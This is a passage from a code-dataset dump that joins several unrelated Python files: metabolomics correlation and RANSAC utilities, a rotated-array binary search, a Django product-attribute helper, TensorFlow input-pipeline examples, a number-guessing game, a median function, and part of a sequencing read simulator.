(featureMetadata[Yon] >= Yvalue - y) & (featureMetadata[Yon] <= Yvalue + y)\n\n\twhile sum(temp==True) == 0:\n\n\t\tx = x + xtol\n\t\ty = y + ytol\n\n\t\ttemp = (featureMetadata[Xon] >= Xvalue - x) & (featureMetadata[Xon] <= Xvalue + x) & (featureMetadata[Yon] >= Yvalue - y) & (featureMetadata[Yon] <= Yvalue + y)\n\n\ttest = featureMetadata.index[temp].values\n\n\treturn test[0]\n\n\ndef _applySampleMask(self, applyMask, threshold=None):\n \"\"\"\n Returns sampleMask - mask of which samples correlation values should be calculated on\n\n Any samples with intensity < threshold will be masked\n \"\"\"\n\n if applyMask == \"All samples\":\n\n sampleMask = True\n\n else:\n\n # Extract driver peak intensity values for all samples\n xVals = self.dataset.intensityData[:,self.Attributes['driver']]\n\n # Calculate relative values\n xVals = xVals/np.nanmax(xVals)\n\n # SampleMask is false for any samples with intensity < threshold\n sampleMask = xVals >= threshold\n\n return sampleMask\n\n\ndef _calcCorrelation(X, driverIX=None, correlationMethod='pearson', sampleMask=None):\n\t\"\"\"\n\tCalculates the specified correlation and correction for multiple tests (if required)\n\n\tCode from:\n\t\tscipy.stats import pearsonr, spearmanr, kendalltau\n\t\tstatsmodels.stats.multitest import multipletests\n\n\tSee relevant documentation for details of allowed methods (listed in drop down menu in ISTOCSY app)\n\n\t:param numpy.ndarray X: intensity data for all features to calculate correlation to\n\t:param numpy.ndarray Y: intensity data for driver feature\n\t:param str correlationMethod: correlation method, one of 'pearson', 'spearman', 'kendalltau'\n\t\"\"\"\n\n\tif driverIX is not None:\n\n\t\t# Apply sampleMask if required\n\t\tif sampleMask is not None:\n\t\t\tX=X[sampleMask,:]\n\n\t\t# Fastest correlation method\n\t\tcVect = np.zeros(X.shape[1])\n\n\t\tif correlationMethod == 'pearson':\n\t\t\tfor col in np.arange(X.shape[1]):\n\t\t\t\tcVect[col], pVal = pearsonr(X[:,col], X[:,driverIX])\n\n\t\telif correlationMethod == 'spearman':\n\t\t\tfor col in np.arange(X.shape[1]):\n\t\t\t\tcVect[col], pVal = spearmanr(X[:,col], X[:,driverIX])\n\n\t\telse:\n\t\t\tfor col in np.arange(X.shape[1]):\n\t\t\t\tcVect[col], pVal = kendalltau(X[:,col], X[:,driverIX])\n\n\telse:\n\n\t\tcVect = np.zeros([X.shape[1], X.shape[1]])\n\n\t\tif correlationMethod == 'pearson':\n\t\t\tfor col in range(X.shape[1]):\n\t\t\t\tfor col2 in range(col, X.shape[1]):\n\t\t\t\t\tcVal, pVal = pearsonr(X[:,col], X[:,col2])\n\t\t\t\t\tcVect[col,col2] = cVal\n\t\t\t\t\tcVect[col2,col] = cVal\n\n\t\telif correlationMethod == 'spearman':\n\t\t\tfor col in range(X.shape[1]):\n\t\t\t\tfor col2 in range(col, X.shape[1]):\n\t\t\t\t\tcVal, pVal = spearmanr(X[:,col], X[:,col2])\n\t\t\t\t\tcVect[col,col2] = cVal\n\t\t\t\t\tcVect[col2,col] = cVal\n\n\t\telse:\n\t\t\tfor col in range(X.shape[1]):\n\t\t\t\tfor col2 in range(col, X.shape[1]):\n\t\t\t\t\tcVal, pVal = kendalltau(X[:,col], X[:,col2])\n\t\t\t\t\tcVect[col,col2] = cVal\n\t\t\t\t\tcVect[col2,col] = cVal\n\n\t# Convert nan values to zero\n\tcVect[np.isnan(cVect)] = 0\n\n\treturn cVect\n\ndef _dropStructuralSetInfo(self):\n\t\"\"\" Delete any exisiting structural set info \"\"\"\n\t\n\ttry:\n\t\tself.dataset.featureMetadata.drop(columns=['Set', 'SortedIX', 'Average Set Correlation'], inplace=True)\n\texcept:\n\t\tpass\n\n\ndef _findStructuralSets(self):\n\t\"\"\"\n\tFinds sets of features in featureTable which are resulting from the same compound (in theory!)\n\n\tFeatures in the same structural set are defined as those which:\n\t\t- correlate with >= attributes['structuralThreshold']\n\t\t- are within a defined retention time window (attributes['rtThreshold'])\n\n\tClusters are defined using networkx\n\n\t:param pandas.dataFrame featureTable feature metadata, must contain 'Retention Time', and 'Correlation' columns\n\t:param numpy.ndarray intensityData: intensity data for all features in featureTable\n\t:param int driverIX: index of driver feature\n\t:param dictionary attributes: settings, must contain 'structuralThreshold', 'rtThreshold', 'correlationMethod'\n\t\"\"\"\n\n\t# Delete columns from existing featureMetadata if has been run previously\n\t_dropStructuralSetInfo(self)\n\n\t# Extract features above correlation threshold only\n\tfeatureTable = self.dataset.featureMetadata[self.dataset.featureMetadata['Feature Mask']].copy()\n\n\t# Return correlation between all features above threshold\n\tC = _calcCorrelation(self.dataset.intensityData[:,self.dataset.featureMetadata['Feature Mask']], correlationMethod=self.Attributes['correlationMethod'])\n\n\t# Calculate difference in RT\n\tRT = np.expand_dims(featureTable['Retention Time'].values, axis=1)\n\tRT = np.tile(RT, featureTable.shape[0])\n\tR = np.abs(RT - np.transpose(RT))\n\n\t# Set R to zero for NMR/Targeted features\n\tR[np.isnan(R)] = 0\n\n\t# Boolean matrices for correlation and RT passing thresholds\n\tCpass = C >= self.Attributes['structuralThreshold']\n\tRpass = R <= self.Attributes['rtThreshold']\n\n\t# Feature connections passing both threshold\n\tO = Cpass & Rpass\n\n\t# Cluster\n\tG = nx.from_numpy_matrix(O)\n\ttemp = list(nx.connected_components(G))\n\n\t# Extract unique sets from clustering network\n\tsetix = 1\n\tfor i in np.arange(len(temp)):\n\t\tfor j in np.arange(featureTable.shape[0]):\n\t\t\tif j in temp[i]:\n\t\t\t\tfeatureTable.loc[featureTable.index[j], 'Set'] = setix\n\t\tsetix = setix+1\n\n\t# Set as int\n\tfeatureTable['Set'] = featureTable['Set'].astype(int)\n\n\t# Driver should be in Set 1\n\tdriverSet = featureTable.loc[self.Attributes['driver'], 'Set']\n\tswitchD = featureTable['Set'] == driverSet\n\tfeatureTable.loc[featureTable.index[featureTable['Set'] == 1], 'Set'] = driverSet\n\tfeatureTable.loc[featureTable.index[switchD==True], 'Set'] = 1\n\n\t# Sort by average correlation to driver, then by RT\n\tsets = np.unique(featureTable['Set'])\n\n\tfor i in sets:\n\t\tsetAv = np.mean(featureTable.loc[featureTable['Set']==i, 'Correlation'])\n\t\tfeatureTable.loc[featureTable['Set']==i, 'Average Set Correlation'] = setAv\n\n#\tfeatureTable.sort_values(['Average Set Correlation','Retention Time'], ascending=[False, True], inplace=True)\n\tfeatureTable.sort_values(['Set','Retention Time'], ascending=[True, True], inplace=True)\n\n\t# Add index for plotting\n\tfeatureTable['SortedIX'] = np.arange(featureTable.shape[0])\n\n\t# save results to featureMetadata table\n\tself.dataset.featureMetadata = self.dataset.featureMetadata.merge(featureTable[['Set', 'SortedIX', 'Average Set Correlation']], how='left', left_index=True, right_index=True)\n\n\ndef _displayMessage(messageText):\n\t\"\"\"\n\tCreates a message box containing messageText\n\n\t:param str messageText: text for display\n\t\"\"\"\n\n\tmessage = QMessageBox()\n\tmessage.setText(messageText)\n\tmessage.exec_()\n\n\ndef _writeOutput(self, mask, unittest=False):\n\t\"\"\" Export correlated feature list to csv with screenshot of app \"\"\"\n\n\tfeatureMetadata = self.dataset.featureMetadata.copy()\n\tsavePath = os.path.join(self.Attributes['saveDir'], self.Attributes['saveName'])\n\n\tif mask is not None:\n\t\tfeatureMetadata = featureMetadata.loc[mask,:]\n\telse:\n\t\tsavePath = savePath + '_allFeatures'\n\n\t# Save output\n\tfeatureMetadata.to_csv(savePath + '.csv', encoding='utf-8')\n\n\t# Save screen shot of app (falls over in testing so only when running for real)\n\tif unittest is False:\n\t\tprinter = QPrinter(QPrinter.HighResolution)\n\t\tprinter.setOutputFileName(savePath + '_screenshot.pdf')\n\t\tprinter.setOutputFormat(QPrinter.PdfFormat)\n\t\tsize = self.size()\n\t\tprinter.setPaperSize(QSizeF(size.width(), size.height()), QPrinter.DevicePixel) # QPrinter.DevicePixel\n\t\tprinter.setFullPage(True)\n\t\tself.render(printer)\n\n\t# Export RANSAC outliers\n\tif hasattr(self, 'RANSAC'):\n\n\t\tself.RANSAC['outliers'].to_csv(savePath.replace('_allFeatures', '') + '_RANSACoutliers.csv', encoding='utf-8')\n\n\ndef _writeData(self):\n\t\"\"\" Export full ISTOCSY dataset \"\"\"\n\n\t# Export intensity data\n\tnp.savetxt(os.path.join(self.Attributes['saveDir'], 'ISTOCSY_dataset_intensityData.csv'), self.dataset.intensityData, delimiter=\",\")\n\n\t# Export sample metadata\n\tsampleMetadata = self.dataset.sampleMetadata.copy()\n\ttry:\n\t\tcolumnsToRemove = ['Sample Mask']\n\t\tsampleMetadata.drop(columnsToRemove, axis=1, inplace=True)\n\texcept:\n\t\tpass\n\n\tsampleMetadata.to_csv(os.path.join(self.Attributes['saveDir'], 'ISTOCSY_dataset_sampleMetadata.csv'), encoding='utf-8')\n\n\t# Export feature metadata (removing feature correlation specific info)\n\tfeatureMetadata = self.dataset.featureMetadata.copy()\n\ttry:\n\t\tcolumnsToRemove = ['Correlation', 'Feature Mask', 'Set', 'SortedIX', 'Average Set Correlation']\n\t\tfeatureMetadata.drop(columnsToRemove, axis=1, inplace=True)\n\texcept:\n\t\tpass\n\n\tfeatureMetadata.to_csv(os.path.join(self.Attributes['saveDir'], 'ISTOCSY_dataset_featureMetadata.csv'), encoding='utf-8')\n\n\ndef _loadBatchFile(self):\n\t\"\"\" Load batch file \"\"\"\n\n\t# Check input\n\tif (self.Attributes['batchFilePath'] is None):\n\t\traise TypeError('Batch file path must be set')\n\n\tself.batchData = pandas.read_csv(self.Attributes['batchFilePath'], index_col=False)#index_col=0)\n\n\t# Ensure columns set to right data type\n\ttry:\n\t\tself.batchData['Drivers'] = self.batchData['Driver'].astype(str)\n\n\texcept:\n\n\t\traise ValueError('ALERT: ' + self.Attributes['batchFilePath'] + ' must contain \"Driver\" field')\n\t\t_displayMessage('ALERT: ' + self.Attributes['batchFilePath'] + ' must contain \"Driver\" field')\n\n\ndef _fitRANSAC(driverIntensity, driverPairIntensity, degree=1):\n\t\"\"\" Fits RANSAC between two sets of intensity values - returns fit, outliers, parameters \"\"\"\n\n\t# Fit RANSAC\n\txcubic = PolynomialFeatures(degree=degree, include_bias=True)\n\n\txdata = xcubic.fit_transform(driverIntensity.reshape(-1, 1))\n\n\transac = RANSACRegressor(LinearRegression())\n\n\transac.fit(xdata, driverPairIntensity)\n\n\transacLine = (ransac.predict(xcubic.fit_transform(driverIntensity.reshape(-1, 1)))).squeeze()\n\n\transacInliers = ransac.inlier_mask_\n\n\transacPlotOrder = np.argsort(driverIntensity)\n \n # CAZ check this\n\n\t# Calculate the devaition from regression at each point\n\tdeviation = np.sqrt((driverPairIntensity - (ransac.estimator_.coef_[1] * driverIntensity + ransac.estimator_.intercept_))**2)\n\n\t# Extract parameters intercept | slope | SSE\n\transacParams = [ransac.estimator_.intercept_, ransac.estimator_.coef_[1], sum(deviation)]\n\n\treturn ransacLine, ransacInliers, ransacPlotOrder, ransacParams\n\n\ndef _applyFitRANSAC(self):\n\t\"\"\" Applys _fitRANSAC between driver and all features correlating above threshold with driver \"\"\"\n\n\t# Extract feature metadata for features passing correlation\n\ttempTable = self.dataset.featureMetadata.loc[self.dataset.featureMetadata['Feature Mask'],:].copy()\n\n # Plot only non masked samples\n\tintensityData = self.dataset.intensityData[self.dataset.sampleMetadata['Sample Mask'],:]\n\tsampleMetadata = self.dataset.sampleMetadata.loc[self.dataset.sampleMetadata['Sample Mask'],:].copy()\n\n\t# Set up\n\tnv = tempTable.shape[0]\n\toutliers = sampleMetadata[['Sample ID', 'Sample File Name']].copy()\n\tlineFit = sampleMetadata[['Sample ID', 'Sample File Name']].copy()\n\tplotOrder = sampleMetadata[['Sample ID', 'Sample File Name']].copy()\n\n\t# Generate data for each feature\n\tfor i in np.arange(nv):\n\n\t\tif tempTable.index[i] == self.Attributes['driver']:\n\t\t\tcontinue\n\n\t\tfeaturePairName = self.dataset.featureMetadata.loc[tempTable.index[i], 'Feature Name']\n\n\t\txVals = intensityData[:, tempTable.index[i]]\n\t\txVals = xVals/np.nanmax(xVals)\n\n\t\tyVals = intensityData[:, self.Attributes['driver']]\n\t\tyVals = yVals/np.nanmax(yVals)\n\n\t\t# fit RANSAC\n\t\transacLine, ransacInliers, ransacPlotOrder, ransacParams = _fitRANSAC(xVals, yVals, self.Attributes['RANSACdegree'])\n\n # Save outliers\n\t\toutliers.loc[:, featurePairName] = ~ransacInliers\n\t\tlineFit.loc[:, featurePairName] = ransacLine\n\t\tplotOrder.loc[:, featurePairName] = ransacPlotOrder\n\n\t\tself.dataset.featureMetadata.loc[tempTable.index[i], 'RANSAC Intercept'] = ransacParams[0]\n\t\tself.dataset.featureMetadata.loc[tempTable.index[i], 'RANSAC Slope'] = ransacParams[1]\n\t\tself.dataset.featureMetadata.loc[tempTable.index[i], 'RANSAC SSE'] = ransacParams[2]\n\n\tself.RANSAC = {\n 'outliers': outliers,\n 'lineFit': lineFit,\n 'plotOrder': plotOrder,\n }\n","sub_path":"pyIstocsy/_utilities.py","file_name":"_utilities.py","file_ext":"py","file_size_in_byte":25787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"353769317","text":"# O(log n) time\n# O(1) space\ndef shiftedBinarySearch(array, target):\n start = 0\n end = len(array) - 1\n mid = (start+end)//2\n while(start <= end):\n if array[mid] == target:\n return mid\n if array[start] <= array[mid]:\n if target < array[mid] and target >= array[start]:\n end = mid-1\n else:\n start=mid+1\n else:\n if target > array[mid] and target <= array[end]:\n start = mid+1\n else:\n end=mid-1\n mid = (start+end)//2\n return -1\n\nprint(shiftedBinarySearch([45,61,71,72,73,0,1,33],33), end='')","sub_path":"AlgoExpert/shiftedSearch.py","file_name":"shiftedSearch.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3727118","text":"# Copyright (c) 2014, Adaptiv Design\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n\n# 3. Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom collections import OrderedDict\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.encoding import smart_text\nfrom django.utils.text import capfirst\nfrom django.utils import six\n\nimport sellmo.contrib.attribute as _attribute\n\nNO_DEFAULT = object()\n\n\nclass AttributeHelper(object):\n def __init__(self):\n self._values = OrderedDict()\n # Serves as a shortcut, can be populated from an index for example\n self._raw_values = {}\n self._attributes = {}\n self._populated = False\n\n def get_values_queryset(self):\n raise NotImplementedError()\n\n def get_new_value(self):\n raise NotImplementedError()\n\n def get_attribute(self, key):\n if key not in self._attributes and not self._populated:\n try:\n attribute = _attribute.models.Attribute.objects.get(key=key)\n self._attributes[key] = attribute\n except _attribute.models.Attribute.DoesNotExist:\n pass\n\n return self._attributes.get(key)\n\n def get_own_value(self, key):\n if key not in self._values and not self._populated:\n try:\n value = self.get_values_queryset().get(\n attribute=self.get_attribute(key)\n )\n self._values[key] = value\n\n # Remove from raw values !\n if key in self._raw_values:\n del self._raw_values[key]\n except _attribute.models.Value.DoesNotExist:\n pass\n\n return self._values.get(key, None)\n\n def get_value(self, key):\n return self.get_own_value(key)\n\n def get_values(self):\n self.populate()\n return list(six.itervalues(self._values))\n\n def get_value_value(self, key):\n if key in self._raw_values:\n return self._raw_values[key]\n\n value = self.get_value(key)\n if value is None:\n raise KeyError(key)\n return value.value\n\n def set_value_value(self, key, value_value):\n value = self.get_own_value(key)\n if value is None:\n value = self.get_new_value()\n value.attribute = self.get_attribute(key)\n self._values[key] = value\n\n # Remove from indexed values !\n if key in self._raw_values:\n del self._raw_values[key]\n\n value.value = value_value\n\n def populate_raw_values(self, raw_values):\n self._raw_values = dict(**raw_values)\n\n def populate(self, values=None):\n if self._populated:\n return\n\n if values is None:\n values = self.get_values_queryset()\n # We'll be accessing attribute\n values = values.select_related('attribute')\n\n for value in values:\n attribute = value.attribute\n self._attributes[attribute.key] = attribute\n if not self._values.has_key(attribute.key):\n self._values[attribute.key] = value\n\n self._populated = True\n\n def get(self, key, default=NO_DEFAULT):\n try:\n return self[key]\n except KeyError:\n if default is not NO_DEFAULT:\n return default\n raise\n\n def __getitem__(self, key):\n key = self._get_key(key)\n return self.get_value_value(key)\n\n def __setitem__(self, key, value):\n key = self._get_key(key)\n self.set_value_value(key, value)\n\n def __contains__(self, key):\n key = self._get_key(key)\n return self.get_value(key) is not None\n\n def _get_key(self, key_or_attribute):\n key = key_or_attribute\n if isinstance(key_or_attribute, _attribute.models.Attribute):\n key = key_or_attribute.key\n return key\n\n def __iter__(self):\n for value in self.get_values():\n if not value.is_empty():\n yield value\n\n def __len__(self):\n return len(\n [\n value for value in self.get_values() if not value.is_empty()\n ]\n )\n\n def save_or_delete_values(self):\n for value in six.itervalues(self._values):\n self.save_or_delete_value(value)\n\n def save_or_delete_value(self, value):\n value.save_or_delete_value()\n\n\nclass ProductAttributeHelper(AttributeHelper):\n def __init__(self, product):\n super(ProductAttributeHelper, self).__init__()\n self._product = product\n\n def get_values_queryset(self):\n if self._product.pk is not None:\n return self._product.values.all()\n else:\n return _attribute.models.Value.objects.none()\n\n def get_new_value(self):\n if self._product.pk is not None:\n return _attribute.models.Value(product=self._product)\n else:\n return _attribute.models.Value()\n\n def save_or_delete_value(self, value):\n value.product = self._product\n value.save_or_delete_value()\n","sub_path":"sellmo/contrib/attribute/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"192796775","text":"import numpy as np\nimport tensorflow as tf\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# 1.consume numpy arrays\n# Load the training data into two NumPy arrays, for example using `np.load()`.\nwith np.load(\"/var/data/training_data.npy\") as data:\n features = data[\"features\"]\n labels = data[\"labels\"]\n# Assume that each row of `features` corresponds to the same row as `labels`.\nassert features.shape[0] == labels.shape[0]\ndataset = tf.data.Dataset.from_tensor_slices((features, labels))\nsess = tf.Session()\n\n\n# 2.feed the NumPy arrays when initialize an Iterator over the dataset\nwith np.load(\"/var/data/training_data.npy\") as data:\n features = data[\"features\"]\n labels = data[\"labels\"]\n# Assume that each row of `features` corresponds to the same row as `labels`.\nassert features.shape[0] == labels.shape[0]\nfeatures_placeholder = tf.placeholder(features.dtype, features.shape)\nlabels_placeholder = tf.placeholder(labels.dtype, labels.shape)\n\ndataset = tf.data.Dataset.from_tensor_slices((features_placeholder, labels_placeholder))\n# [Other transformations on `dataset`...]\ndataset = ...\niterator = dataset.make_initializable_iterator()\nsess.run(iterator.initializer, feed_dict={features_placeholder: features,\n labels_placeholder: labels})\n\n\n# 3.Consuming TFRecord data\n# Creates a dataset that reads all of the examples from two files.\nfilenames = [\"./train.tfrecords\"]\ndataset = tf.data.TFRecordDataset(filenames)\n\n\n# 4.use a tf.placeholder(tf.string) to represent the filenames\nfilenames = tf.placeholder(tf.string, shape=[None])\ndataset = tf.data.TFRecordDataset(filenames)\ndataset = dataset.map(...) # Parse the record into tensors.\ndataset = dataset.repeat() # Repeat the input indefinitely.\ndataset = dataset.batch(32)\niterator = dataset.make_initializable_iterator()\n# You can feed the initializer with the appropriate filenames for the current\n# phase of execution, e.g. training vs. validation.\n# Initialize `iterator` with training data.\ntraining_filenames = [\"/var/data/file1.tfrecord\", \"/var/data/file2.tfrecord\"]\nsess.run(iterator.initializer, feed_dict={filenames: training_filenames})\n# Initialize `iterator` with validation data.\nvalidation_filenames = [\"/var/data/validation1.tfrecord\", ...]\nsess.run(iterator.initializer, feed_dict={filenames: validation_filenames})\n\n\n# 5.Consuming text data\nfilenames = [\"/var/data/file1.txt\", \"/var/data/file2.txt\"]\ndataset = tf.data.TextLineDataset(filenames)\n\n# 6.use Dataset.flat_map() to create a nested Dataset for each file.\nfilenames = [\"/var/data/file1.txt\", \"/var/data/file2.txt\"]\ndataset = tf.data.Dataset.from_tensor_slices(filenames)\n# Use `Dataset.flat_map()` to transform each file as a separate nested dataset,\n# and then concatenate their contents sequentially into a single \"flat\" dataset.\n# * Skip the first line (header row).\n# * Filter out lines beginning with \"#\" (comments).\ndataset = dataset.flat_map(\n lambda filename: (\n tf.data.TextLineDataset(filename)\n .skip(1)\n .filter(lambda line: tf.not_equal(tf.substr(line, 0, 1), \"#\"))))\n\n\n# 7.Parsing tf.Example protocol buffer messages\n# Transforms a scalar string `example_proto` into a pair of a scalar string and\n# a scalar integer, representing an image and its label, respectively.\ndef _parse_function(example_proto):\n features = {\"image\": tf.FixedLenFeature((), tf.string, default_value=\"\"),\n \"label\": tf.FixedLenFeature((), tf.int32, default_value=0)}\n parsed_features = tf.parse_single_example(example_proto, features)\n return parsed_features[\"image\"], parsed_features[\"label\"]\n# Creates a dataset that reads all of the examples from two files, and extracts\n# the image and label features.\nfilenames = [\"/var/data/file1.tfrecord\", \"/var/data/file2.tfrecord\"]\ndataset = tf.data.TFRecordDataset(filenames)\ndataset = dataset.map(_parse_function)\n\n\n","sub_path":"programmer_guide/importing_data/reading_input_data.py","file_name":"reading_input_data.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"104335392","text":"# full program\n\n# modules\nimport math\nimport random\n\n# integer checking function\n\n\ndef int_check(question, low=None, high=None):\n\n # Error messages\n if low is not None and high is not None:\n error = \"Please enter an integer between {} and {} \" \\\n \"(inclusive)\".format(low, high)\n elif low is not None and high is None:\n error = \"Please enter an integer that is more than or \" \\\n \"equal to {}\".format(low)\n elif low is None and high is not None:\n error = \"Please enter aqn integer that is less than or \" \\\n \"equal to {}\".format(high)\n else:\n error = \"Whoops please enter an integer\"\n\n while True:\n\n try:\n response = int(input(question))\n\n # Checks response is not too low\n if low is not None and response < low:\n print(error)\n continue\n\n # Checks response is not too high\n if high is not None and response > high:\n print(error)\n continue\n\n return response\n\n except ValueError:\n print(error)\n continue\n\n# statement generator function\n\n\ndef hl_statement(statement, char):\n print()\n print(char*len(statement))\n print(statement)\n print(char*len(statement))\n print\n\n\n# main routine\n\n# Introduction\n\nprint(\"Welcome to the Higher Lower game\")\nprint()\nprint(\"Your goal is to guess a secret number within a certain amount of guesses\")\nprint()\nprint(\"You can choose how many rounds you want to play and the numbers you would like to guess between\")\nprint()\nprint(\"At the end of the game your best, worst, and average score will be displayed\")\nprint()\nprint(\"Good Luck!!\")\nprint()\n\n\nkeep_going = \"\"\nwhile keep_going == \"\":\n\n rounds = int_check(\"How many rounds would you like to play? \", 1)\n lowest = int_check(\"Please enter a low number \")\n highest = int_check(\"Please enter a high number \", lowest + 1)\n range = highest - lowest + 1\n max_raw = math.log2(range) # finds maximum number of guesses using binary search\n max_upped = math.ceil(max_raw) # rounds up\n max_guesses = max_upped + 1\n print(\"You have {} guesses\".format(max_guesses))\n\n\n game_stats = []\n already_guessed = []\n\n num_won = 0\n rounds_played = 0\n\n while rounds_played < rounds:\n print(\"Round {}\".format(rounds_played + 1))\n\n guess = \"\"\n guesses_left = max_guesses\n secret = random.randint(lowest, highest)\n\n while guess != secret and guesses_left >= 1:\n\n guess = int_check(\"Guess the number \", lowest, highest)\n if guess in already_guessed:\n print(\"You have already guessed that number! Please try again. \"\n \"You still have {} guesses left\".format(guesses_left))\n continue\n guesses_left -= 1\n already_guessed.append(guess)\n\n\n # if user has guess left\n if guesses_left >= 1:\n\n if guess > secret:\n hl_statement(\"vv Too high, guess a lower number vv\", \"v\" )\n print(\"you have {} guesses left\".format(guesses_left))\n elif guess < secret:\n hl_statement(\"^^ Too low, guess a higher number ^^\", \"^\")\n print(\"you have {} guesses left\".format(guesses_left))\n\n # if user is out of guesses\n else:\n if guess < secret:\n print(\"Too low\")\n elif guess > secret:\n print(\"To high\")\n\n if guess == secret:\n # if user has guessed right the first time...\n if guesses_left == max_guesses - 1:\n hl_statement(\"** Amazing! You got it first try **\", \"*\")\n num_won += 1\n # if user has had more than one guess\n else:\n hl_statement(\"** Congratulations! You guessed the number **\", \"*\")\n print(\"you had {} guesses left\".format(guesses_left))\n num_won += 1\n else:\n print(\"Sorry, you have no guesses left. Game Over\")\n guesses_left -= 1 # Penalty point for losing\n\n game_stats.append(max_guesses - guesses_left)\n print(\"Won: {} \\t | \\t Lost: {}\".format(num_won, rounds_played - num_won + 1))\n rounds_played += 1\n already_guessed = []\n\n # print each rounds outcome...\n print()\n print(\"*** Game Scores ***\")\n list_count = 1\n for item in game_stats:\n\n # indicates if game has been won or lost\n if item > max_guesses:\n status = \"lost\"\n else:\n status = \"won\"\n\n print(\"Round {}: {} \".format(list_count, item))\n list_count += 1\n\n # Calculate (and then print) statistics\n game_stats.sort()\n best = game_stats[0] # first item in sorted list\n worst = game_stats[-1] # last item in sorted list\n average = sum(game_stats)/len(game_stats)\n\n print()\n print(\"*** Summary Statistics ***\")\n print(\"Best: {}\".format(best))\n print(\"Worst: {}\".format(worst))\n print(\"Average: {:.2f}\".format(average))\n\n print()\n keep_going = input(\"Press to play again or any key to quit \")\n print()\n\nprint(\"Thank you for playing. Good bye\")\n","sub_path":"14_final_version.py","file_name":"14_final_version.py","file_ext":"py","file_size_in_byte":5279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"634045402","text":"\"\"\"\nWrite a function called median that takes a list as an input\nand returns the median value of the list.\nThe median is the middle number in a sorted sequence of numbers.\nIf you are given a sequence with an even number of elements,\nyou must average the two elements surrounding the middle.\n\"\"\"\ndef median(num_lst):\n sort_lst = sorted(num_lst)\n if len(num_lst) % 2 == 0:\n middle_num = (sort_lst[int(len(num_lst) / 2 - 1)]\n + sort_lst[int(len(num_lst) / 2)]) / 2\n else:\n middle_num = sort_lst[int(len(num_lst) / 2)]\n\n return middle_num\n\nnum_lst = [4, 5, 5, 4]\nprint(median(num_lst))","sub_path":"Unit08_Loops/median.py","file_name":"median.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"240602442","text":"#!/usr/bin/env python\n\n# usage: ./cmd \n\nimport sys\nimport random\nimport math\nfrom random import shuffle\nimport time\nimport datetime\n\n# my library\nimport mut\nimport common\n\n\nMAX_LEN = 160000\nMIN_LEN = 20\n\n\nchr_name = ''\n \ndef get_chr( fasta, seq, read_len ) :\n\n chr_name = ''\n\n while True :\n line = fasta.readline().strip()\n if line.startswith('>') :\n chr_name = line.strip().strip('>').split(' ')[0]\n #print >> sys.stderr, chr_name\n break\n elif len(line) == 0 :\n break\n else :\n seq += line\n #print >> sys.stderr, '2', line\n\n return chr_name, seq\n\ndef get_more_lines( fasta, seq, read_len, base_per_line ) :\n\n if len(seq) < read_len : \n r = int( math.ceil( read_len/float(base_per_line) ) )\n for c in range(r) :\n line = fasta.readline().strip()\n seq = seq + fasta.readline().strip()\n else : \n pass\n\n return seq\n\ndef readsim( sub_cmd, tech, prefix, ref_file, rev_strd, replace, read_mu, read_dist, cov_mu, \n sub_mu, in_mu, del_mu, times ) :\n\n common.intro_readsim( tech, ref_file, read_mu, read_dist, cov_mu, \n sub_mu, in_mu, del_mu ) \n\n fasta = open(ref_file)\n orientation = ''\n i = 0\n read_num = 0\n\n ################################################################## \n firstline = fasta.readline().strip()\n chr = firstline.split()[0].strip('>').split(':')[0]\n\n ################################################################## \n print >> sys.stderr, \"{0} {1} reading {2}\".format( common.INFO_002, datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ref_file )\n seq = ''\n for line in fasta :\n seq += line.strip()\n\n print >> sys.stderr, \"{0} {1} done.\".format( common.INFO_002, datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') )\n ################################################################## \n if read_dist == 'uniform' : \n\n lens = [read_mu]\n\n elif read_dist == 'normal' or read_dist == 'exp' :\n\n lens = []\n target = cov_mu * len( seq ) \n s = 0\n\n print >> sys.stderr, \"{0} {1} generating length given distribution.\".format( common.INFO_002, datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') )\n\n if read_dist == 'normal' : \n while s < target : \n l = common.get_num_from_normal( read_mu ) \n lens.append( l ) \n s += l\n\n elif read_dist == 'exp' : \n while 